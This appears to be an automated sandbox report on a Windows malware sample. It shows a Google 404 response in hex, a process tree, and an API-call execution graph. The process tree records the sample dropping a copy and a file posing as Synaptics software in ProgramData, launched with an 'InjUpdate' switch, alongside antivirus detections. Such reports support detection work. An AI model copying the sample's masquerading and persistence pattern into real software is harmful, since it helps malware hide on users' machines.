                                                                                                                                                                                        2022-05-17 11:31:42 UTC304INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 7a 62 6a 4c 4d 77 2b 31 7a 32 53 5a 79 30 36 32 45 6a 31 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9zbjLMw+1z2SZy062Ej1rQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:42 UTC306INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:42 UTC306INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:13:31:08
                                                                                                                                                                                        Start date:17/05/2022
                                                                                                                                                                                        Path:C:\Users\user\Desktop\A1FsbRkm5m.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\A1FsbRkm5m.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:4148224 bytes
                                                                                                                                                                                        MD5 hash:6A23EB71A9D38BB41D260439E66B9089
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.268169059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                        Start time:13:31:11
                                                                                                                                                                                        Start date:17/05/2022
                                                                                                                                                                                        Path:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe"
                                                                                                                                                                                        Imagebase:0xc80000
                                                                                                                                                                                        File size:3376704 bytes
                                                                                                                                                                                        MD5 hash:F135AB78927AA00AC4A6CAEDD23E2B7F
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                        • Detection: 4%, ReversingLabs
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                        Start time:13:31:14
                                                                                                                                                                                        Start date:17/05/2022
                                                                                                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:771584 bytes
                                                                                                                                                                                        MD5 hash:589E0853896F9B8A51BAD44FD736043E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.280600847.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.404477075.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.375038876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                        • Detection: 88%, ReversingLabs
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:13:31:16
                                                                                                                                                                                        Start date:17/05/2022
                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                                        File size:27110184 bytes
                                                                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:13:31:27
                                                                                                                                                                                        Start date:17/05/2022
                                                                                                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:771584 bytes
                                                                                                                                                                                        MD5 hash:589E0853896F9B8A51BAD44FD736043E
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.308161796.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:13:32:07
                                                                                                                                                                                        Start date:17/05/2022
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424
                                                                                                                                                                                        Imagebase:0x900000
                                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                        Start time:13:32:30
                                                                                                                                                                                        Start date:17/05/2022
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424
                                                                                                                                                                                        Imagebase:0x7ff674600000
                                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:3.5%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:6.2%
                                                                                                                                                                                          Total number of Nodes:835
                                                                                                                                                                                          Total number of Limit Nodes:27
                                                                                                                                                                                          execution_graph 17295 409a48 17298 4099e0 17295->17298 17304 404e80 17298->17304 17301 409a05 FindClose 17302 409a39 17301->17302 17303 409a14 FileTimeToLocalFileTime FileTimeToDosDateTime 17301->17303 17303->17302 17305 404e84 FindFirstFileA 17304->17305 17305->17301 17305->17302 17306 49ab80 17315 406d28 GetModuleHandleA 17306->17315 17308 49ab90 17319 45a28c 17308->17319 17310 49abad 17330 45a714 17310->17330 17316 406d5b 17315->17316 17354 404684 17316->17354 17320 45a2ae 17319->17320 17321 45a2eb 17319->17321 17559 45a240 17320->17559 17569 404a14 17321->17569 17324 4049c0 17 API calls 17326 45a30d 17324->17326 17325 45a2b8 17327 45a2d4 SetWindowTextA 17325->17327 17329 45a2e9 17325->17329 17326->17310 17565 4049c0 17327->17565 17329->17324 17589 408d70 17330->17589 17333 45a7da 17342 40484c 17333->17342 17335 45a790 17335->17333 17611 45a580 17335->17611 17336 45a75b 17336->17335 17337 45a792 17336->17337 17338 45a788 17336->17338 17607 453c80 17337->17607 17596 45a054 IsIconic 17338->17596 17346 404865 17342->17346 17343 404884 17969 4047c0 17343->17969 17344 404895 17965 4045c4 17344->17965 17346->17343 17346->17344 17348 40488e 17348->17344 17349 4048aa 17350 4048d0 FreeLibrary 17349->17350 17353 4048d6 17349->17353 17350->17353 17351 40490b 17352 404903 ExitProcess 17353->17351 17353->17352 17355 4046b7 17354->17355 17358 404624 17355->17358 17359 404660 17358->17359 17360 404633 17358->17360 17359->17308 17360->17359 17363 405f94 17360->17363 17367 40275c 17360->17367 17364 405fa4 GetModuleFileNameA 17363->17364 17366 405fc0 17363->17366 17373 4061d0 GetModuleFileNameA RegOpenKeyExA 17364->17373 17366->17360 17368 402761 17367->17368 17369 402774 17367->17369 17412 402188 17368->17412 17369->17360 17370 402767 17370->17369 17423 4028b8 17370->17423 17374 406253 17373->17374 17375 406213 RegOpenKeyExA 17373->17375 17391 406018 GetModuleHandleA 17374->17391 17375->17374 17376 406231 RegOpenKeyExA 17375->17376 17376->17374 17378 4062dc lstrcpyn GetThreadLocale GetLocaleInfoA 17376->17378 17380 406313 17378->17380 17381 4063f6 17378->17381 17380->17381 17384 406323 lstrlen 17380->17384 17381->17366 17382 406298 RegQueryValueExA 17383 4062b6 RegCloseKey 17382->17383 17383->17366 17386 40633b 17384->17386 17386->17381 17387 406360 lstrcpyn LoadLibraryExA 17386->17387 17388 406388 17386->17388 17387->17388 17388->17381 17389 406392 lstrcpyn LoadLibraryExA 17388->17389 17389->17381 17390 4063c4 lstrcpyn LoadLibraryExA 17389->17390 17390->17381 17392 406080 17391->17392 17393 406040 GetProcAddress 17391->17393 17395 4061a2 RegQueryValueExA 17392->17395 17406 4060b3 17392->17406 17408 406004 17392->17408 17393->17392 17394 406051 17393->17394 17394->17392 17398 406067 lstrcpyn 17394->17398 17395->17382 17395->17383 17396 4060c6 lstrcpyn 17403 4060e4 17396->17403 17398->17395 17399 40618e lstrcpyn 17399->17395 17401 406004 CharNextA 17401->17403 17402 406004 CharNextA 17402->17406 17403->17395 17403->17399 17403->17401 17404 406103 lstrcpyn FindFirstFileA 17403->17404 17404->17395 17405 40612e FindClose lstrlen 17404->17405 17405->17395 17407 40614d lstrcpyn lstrlen 17405->17407 17406->17395 17406->17396 17407->17403 17409 40600c 17408->17409 17410 406017 17409->17410 17411 406006 CharNextA 17409->17411 17410->17395 17410->17402 17411->17409 17413 4021a1 17412->17413 17414 40219c 17412->17414 17416 4021ad 17413->17416 17417 4021ce RtlEnterCriticalSection 17413->17417 17418 4021d8 17413->17418 17429 401a9c RtlInitializeCriticalSection 17414->17429 17416->17370 17417->17418 17418->17416 17436 402094 17418->17436 17421 402303 17421->17370 17422 4022f9 RtlLeaveCriticalSection 17422->17421 17424 40286c 17423->17424 17425 402891 17424->17425 17538 406cdc 17424->17538 17546 402860 17425->17546 17430 401ac0 RtlEnterCriticalSection 17429->17430 17431 401aca 17429->17431 17430->17431 17432 401ae8 LocalAlloc 17431->17432 17433 401b02 17432->17433 17434 401b51 17433->17434 17435 401b47 RtlLeaveCriticalSection 17433->17435 17434->17413 17435->17434 17437 4020a4 17436->17437 17438 4020d0 17437->17438 17441 4020f4 17437->17441 17442 402008 17437->17442 17438->17441 17447 401ea8 17438->17447 17441->17421 17441->17422 17451 40185c 17442->17451 17444 402018 17446 402025 17444->17446 17460 401f7c 17444->17460 17446->17437 17448 401efd 17447->17448 17449 401ec6 17447->17449 17448->17449 17502 401df8 17448->17502 17449->17441 17454 401878 17451->17454 17453 401882 17467 401748 17453->17467 17454->17453 17457 4018d3 17454->17457 17459 40188e 17454->17459 17471 4015b4 17454->17471 17479 4014b0 17454->17479 17483 401690 17457->17483 17459->17444 17490 401f30 17460->17490 17463 4014b0 LocalAlloc 17464 401fa0 17463->17464 17466 401fa8 17464->17466 17494 401cd4 17464->17494 17466->17446 17469 40178e 17467->17469 17468 4017be 17468->17459 17469->17468 17470 4017aa VirtualAlloc 17469->17470 17470->17468 17470->17469 17472 4015c3 VirtualAlloc 17471->17472 17474 4015f0 17472->17474 17475 401613 17472->17475 17487 401468 17474->17487 17475->17454 17478 401600 VirtualFree 17478->17475 17480 4014cc 17479->17480 17481 401468 LocalAlloc 17480->17481 17482 401512 17481->17482 17482->17454 17486 4016bf 17483->17486 17484 401718 17484->17459 17485 4016ec VirtualFree 17485->17486 17486->17484 17486->17485 17488 401410 LocalAlloc 17487->17488 17489 401473 17488->17489 17489->17475 17489->17478 17491 401f42 17490->17491 17492 401f39 17490->17492 17491->17463 17492->17491 17499 401d04 17492->17499 17495 401cf1 17494->17495 17496 401ce2 17494->17496 17495->17466 17497 401ea8 9 API calls 17496->17497 17498 401cef 17497->17498 17498->17466 17500 402318 9 API calls 17499->17500 17501 401d25 17500->17501 17501->17491 17503 401e0e 17502->17503 17504 401e39 17503->17504 17505 401e4d 17503->17505 17514 401e96 17503->17514 17515 401a10 17504->17515 17507 401a10 3 API calls 17505->17507 17508 401e4b 17507->17508 17509 401cd4 9 API calls 17508->17509 17508->17514 17510 401e71 17509->17510 17511 401e8b 17510->17511 17525 401d28 17510->17525 17530 401520 17511->17530 17514->17449 17516 401a36 17515->17516 17524 401a8f 17515->17524 17534 4017dc 17516->17534 17519 4014b0 LocalAlloc 17521 401a53 17519->17521 17520 401a6a 17523 401520 LocalAlloc 17520->17523 17520->17524 17521->17520 17522 401690 VirtualFree 17521->17522 17522->17520 17523->17524 17524->17508 17526 401d3b 17525->17526 17527 401d2d 17525->17527 17526->17511 17528 401d04 9 API calls 17527->17528 17529 401d3a 17528->17529 17529->17511 17531 40152b 17530->17531 17532 401546 17531->17532 17533 401468 LocalAlloc 17531->17533 17532->17514 17533->17532 17536 401813 17534->17536 17535 401853 17535->17519 17536->17535 17537 40182d VirtualFree 17536->17537 17537->17536 17539 406d11 TlsGetValue 17538->17539 17540 406ceb 17538->17540 17541 406cf6 17539->17541 17542 406d1b 17539->17542 17540->17425 17549 406c98 17541->17549 17542->17425 17544 406cfb TlsGetValue 17545 406d0a 17544->17545 17545->17425 17556 404924 17546->17556 17550 406c9e 17549->17550 17553 406cc2 17550->17553 17555 406c84 LocalAlloc 17550->17555 17552 406cbe 17552->17553 17554 406cce TlsSetValue 17552->17554 17553->17544 17554->17553 17555->17552 17557 40484c 17 API calls 17556->17557 17558 40286b 17557->17558 17558->17369 17560 45a275 17559->17560 17561 45a255 GetWindowTextA 17559->17561 17563 404a14 31 API calls 17560->17563 17575 404ab0 17561->17575 17564 45a273 17563->17564 17564->17325 17566 4049c6 17565->17566 17568 4049e1 17565->17568 17566->17568 17585 40277c 17566->17585 17568->17329 17570 404a18 17569->17570 17571 404a28 17569->17571 17570->17571 17573 404a84 31 API calls 17570->17573 17572 404a56 17571->17572 17574 40277c 17 API calls 17571->17574 17572->17329 17573->17571 17574->17572 17580 404a84 17575->17580 17577 404ac0 17578 4049c0 17 API calls 17577->17578 17579 404ad8 17578->17579 17579->17564 17581 404a88 17580->17581 17582 404aac 17580->17582 17583 40275c 31 API calls 17581->17583 17582->17577 17584 404a95 17583->17584 17584->17577 17586 402781 17585->17586 17587 402794 17585->17587 17586->17587 17588 4028b8 17 API calls 17586->17588 17587->17568 17588->17587 17590 40275c 31 API calls 17589->17590 17591 408d7d 17590->17591 17591->17333 17591->17336 17592 454d78 17591->17592 17593 454db4 17592->17593 17594 454d86 17592->17594 17593->17336 17594->17593 17595 454dae ShowWindow 17594->17595 17595->17593 17597 45a0e9 17596->17597 17598 45a069 17596->17598 17597->17335 17616 45973c 17598->17616 17601 45a0dc 17619 45906c 17601->17619 17602 45a07f 17602->17601 17604 45a096 IsWindowEnabled 17602->17604 17604->17601 17605 45a0a0 17604->17605 17606 45a0bb SetWindowPos NtdllDefWindowProc_A 17605->17606 17606->17597 17608 453c8f 17607->17608 17609 453ca6 17607->17609 17608->17335 17609->17608 17692 454db8 17609->17692 17721 45a4e8 PeekMessageA 17611->17721 17614 45a59c 17614->17335 17627 459634 17616->17627 17688 459014 SystemParametersInfoA 17619->17688 17621 459085 ShowWindow 17624 459097 17621->17624 17625 459090 17621->17625 17624->17597 17691 459044 SystemParametersInfoA 17625->17691 17628 4596d8 SetActiveWindow 17627->17628 17629 45964a 17627->17629 17628->17601 17628->17602 17629->17628 17630 459657 EnumWindows 17629->17630 17630->17628 17631 45967a GetWindow GetWindowLongA 17630->17631 17685 4595c4 GetWindow 17630->17685 17632 459697 17631->17632 17632->17628 17635 41ac6c 17632->17635 17636 41ac76 17635->17636 17637 41ac8a SetWindowPos 17636->17637 17639 41abf8 17636->17639 17637->17628 17637->17632 17646 406a70 17639->17646 17641 41ac1b 17652 41abc0 17641->17652 17647 406a80 17646->17647 17648 406ab1 17646->17648 17647->17648 17656 405fdc 17647->17656 17648->17641 17650 406aa0 LoadStringA 17651 404ab0 31 API calls 17650->17651 17651->17648 17653 41abce 17652->17653 17661 40d180 17653->17661 17655 41abed 17655->17655 17657 406003 17656->17657 17659 405fe6 17656->17659 17657->17650 17658 405f94 30 API calls 17660 405ffc 17658->17660 17659->17657 17659->17658 17660->17650 17662 40d18c 17661->17662 17669 40a664 17662->17669 17665 404a14 31 API calls 17666 40d1c4 17665->17666 17667 4049c0 17 API calls 17666->17667 17668 40d1d9 17667->17668 17668->17655 17672 40a678 17669->17672 17673 40a69c 17672->17673 17674 40a26c 62 API calls 17673->17674 17675 40a6c7 17673->17675 17674->17675 17676 40a71f 17675->17676 17683 40a6dc 17675->17683 17677 404ab0 31 API calls 17676->17677 17679 40a673 17677->17679 17678 40a715 17680 40500c 31 API calls 17678->17680 17679->17665 17680->17679 17681 4049c0 17 API calls 17681->17683 17682 40500c 31 API calls 17682->17683 17683->17678 17683->17681 17683->17682 17684 40a26c 62 API calls 17683->17684 17684->17683 17686 4595e3 GetWindowLongA 17685->17686 17687 4595ef 17685->17687 17686->17687 17689 459032 17688->17689 17689->17621 17690 459044 SystemParametersInfoA 17689->17690 17690->17621 17691->17624 17693 455104 17692->17693 17694 454dcf 17692->17694 17693->17608 17694->17693 17695 454dfd 17694->17695 17696 454de8 17694->17696 17698 454e28 17695->17698 17700 454e13 17695->17700 17706 4547d0 17696->17706 17699 454df5 17698->17699 17718 458230 17698->17718 17701 4547d0 62 API calls 17699->17701 17702 4547d0 62 API calls 17700->17702 17704 454e45 17701->17704 17702->17699 17704->17693 17705 458230 62 API calls 17704->17705 17705->17704 17707 4547ea 17706->17707 17708 458230 62 API calls 17707->17708 17709 45482d 17707->17709 17710 454817 17707->17710 17708->17707 17711 41ac6c 62 API calls 17709->17711 17715 454855 17709->17715 17712 458230 62 API calls 17710->17712 17711->17709 17713 454821 17712->17713 17713->17699 17714 458230 62 API calls 17714->17715 17715->17713 17715->17714 17716 45489b 17715->17716 17717 458230 62 API calls 17716->17717 17717->17713 17719 41ac6c 62 API calls 17718->17719 17720 458240 17719->17720 17720->17699 17722 45a504 17721->17722 17723 45a572 17721->17723 17722->17723 17754 45a448 17722->17754 17723->17614 17733 45ae50 17723->17733 17732 45a564 TranslateMessage DispatchMessageA 17732->17723 17813 45add8 GetCursorPos 17733->17813 17735 45ae7a 17736 45ae99 17735->17736 17738 45b3a8 8 API calls 17735->17738 17818 458df8 17736->17818 17738->17736 17739 45aea3 17826 4380e0 17739->17826 17743 45aebb 17744 45aefd GetCurrentThreadId 17743->17744 17843 45ad74 17743->17843 17747 45af2b 17744->17747 17748 45af32 17744->17748 17849 4214b8 GetCurrentThreadId 17747->17849 17750 45af45 17748->17750 17751 45af40 WaitMessage 17748->17751 17867 4049e4 17750->17867 17751->17750 17755 45a473 17754->17755 17756 45a45c 17754->17756 17755->17723 17758 45a340 17755->17758 17756->17755 17776 45b3a8 17756->17776 17759 45a350 17758->17759 17760 45a38a 17758->17760 17759->17760 17761 45a377 TranslateMDISysAccel 17759->17761 17760->17723 17762 45a390 17760->17762 17761->17760 17763 45a3a8 17762->17763 17767 45a410 17762->17767 17764 45a3b3 GetCapture 17763->17764 17763->17767 17765 45a414 GetWindowLongA 17764->17765 17769 45a3be 17764->17769 17766 45a424 SendMessageA 17765->17766 17765->17767 17766->17767 17767->17723 17773 45a31c 17767->17773 17770 45a3cf 17769->17770 17772 45a3d8 GetParent 17769->17772 17800 437e5c 17769->17800 17771 45a3f5 SendMessageA 17770->17771 17771->17767 17772->17769 17774 45a33c 17773->17774 17775 45a32f IsDialogMessage 17773->17775 17774->17723 17774->17732 17775->17774 17777 45b3b1 17776->17777 17778 45b3cd 17776->17778 17784 45b364 17777->17784 17778->17755 17785 45b3a5 17784->17785 17786 45b372 17784->17786 17790 458fb8 17785->17790 17786->17785 17787 45b388 IsWindowVisible 17786->17787 17787->17785 17788 45b392 17787->17788 17789 45b39f ShowWindow 17788->17789 17789->17785 17791 458fc1 UnhookWindowsHookEx 17790->17791 17792 458fcc 17790->17792 17791->17792 17793 459013 17792->17793 17794 458fdc SetEvent GetCurrentThreadId 17792->17794 17797 45b1f4 17793->17797 17795 458ff4 WaitForSingleObject 17794->17795 17796 459001 CloseHandle 17794->17796 17795->17796 17796->17793 17798 45b217 17797->17798 17799 45b203 KillTimer 17797->17799 17798->17778 17799->17798 17801 437eae 17800->17801 17802 437e67 GetWindowThreadProcessId 17800->17802 17801->17769 17802->17801 17803 437e72 GetCurrentProcessId 17802->17803 17803->17801 17804 437e7c 17803->17804 17805 437e86 GlobalFindAtomA 17804->17805 17806 437ea7 17805->17806 17807 437e95 GetPropA 17805->17807 17809 437e28 GetWindowThreadProcessId 17806->17809 17807->17801 17810 437e37 GetCurrentProcessId 17809->17810 17811 437e54 17809->17811 17810->17811 17812 437e41 SendMessageA 17810->17812 17811->17801 17812->17801 17871 439828 17813->17871 17817 45adf6 17817->17735 17819 458e24 17818->17819 17820 458e02 17818->17820 17822 4049c0 17 API calls 17819->17822 17820->17819 17821 458e10 17820->17821 17823 404a14 31 API calls 17821->17823 17824 458e2b 17822->17824 17825 458e1d 17823->17825 17824->17739 17825->17739 17896 40debc 17826->17896 17829 438104 17900 404ee0 17829->17900 17830 4380f9 17832 404a14 31 API calls 17830->17832 17833 438102 17832->17833 17834 45b010 17833->17834 17835 45b024 17834->17835 17836 45b03a 17835->17836 17837 404a14 31 API calls 17835->17837 17836->17743 17838 45b030 17837->17838 17838->17836 17911 435014 17838->17911 17840 45b058 17915 447578 17840->17915 17842 45b065 17842->17743 17847 45ad81 17843->17847 17844 45add4 17844->17744 17846 45adab IsWindowVisible 17846->17847 17847->17844 17847->17846 17848 45adbc IsWindowEnabled 17847->17848 17940 45827c 17847->17940 17848->17847 17850 4214d2 GetCurrentThreadId 17849->17850 17854 4214f6 17849->17854 17943 40d23c 17850->17943 17852 421508 17957 42146c ResetEvent 17852->17957 17853 4214ff 17953 421478 WaitForSingleObject 17853->17953 17854->17852 17854->17853 17858 42150d RtlEnterCriticalSection InterlockedExchange 17859 42154f 17858->17859 17860 421611 17859->17860 17861 41ac6c 62 API calls 17859->17861 17860->17748 17862 42157a 17861->17862 17958 41ab5c 17862->17958 17864 421587 RtlLeaveCriticalSection 17865 4215b8 RtlEnterCriticalSection 17864->17865 17865->17748 17868 4049ea 17867->17868 17869 404a10 17868->17869 17870 40277c 17 API calls 17868->17870 17869->17614 17870->17868 17879 4397f4 WindowFromPoint 17871->17879 17873 439860 17876 438124 GetCapture 17873->17876 17874 43983c 17874->17873 17884 43eff0 17874->17884 17877 437e5c 7 API calls 17876->17877 17878 43812e 17877->17878 17878->17817 17880 439821 17879->17880 17881 439808 17879->17881 17880->17874 17881->17880 17882 437e5c 7 API calls 17881->17882 17883 439815 GetParent 17881->17883 17882->17881 17883->17880 17883->17881 17886 43f041 17884->17886 17889 43f00b 17884->17889 17885 43f078 17885->17873 17886->17885 17888 41ac6c 62 API calls 17886->17888 17891 43ef38 PtInRect 17886->17891 17887 41ac6c 62 API calls 17887->17889 17888->17886 17889->17886 17889->17887 17892 43ef38 17889->17892 17891->17886 17893 43ef60 17892->17893 17894 43ef82 PtInRect 17893->17894 17895 43ef8f 17894->17895 17895->17889 17897 40decd 17896->17897 17907 40df80 17897->17907 17901 404f12 17900->17901 17902 404ee5 17900->17902 17903 4049c0 17 API calls 17901->17903 17902->17901 17904 404ef9 17902->17904 17906 404f08 17903->17906 17905 404ab0 31 API calls 17904->17905 17905->17906 17906->17833 17908 40df95 17907->17908 17909 40dedf 17907->17909 17908->17909 17910 40dfda CompareStringA 17908->17910 17909->17829 17909->17830 17910->17908 17910->17909 17912 43501a 17911->17912 17919 447188 17912->17919 17914 43502f 17914->17840 17918 44758c 17915->17918 17916 404a14 31 API calls 17917 4475cb 17916->17917 17917->17842 17918->17916 17918->17917 17920 44718e 17919->17920 17923 422444 17920->17923 17922 4471a3 17922->17914 17924 42244a 17923->17924 17927 421b3c 17924->17927 17926 42245f 17926->17922 17929 421b43 17927->17929 17928 421b66 17928->17926 17929->17928 17931 421cf4 17929->17931 17932 421d08 17931->17932 17933 421d3a 17932->17933 17935 4221c4 17932->17935 17933->17928 17937 4221d4 17935->17937 17936 42220d 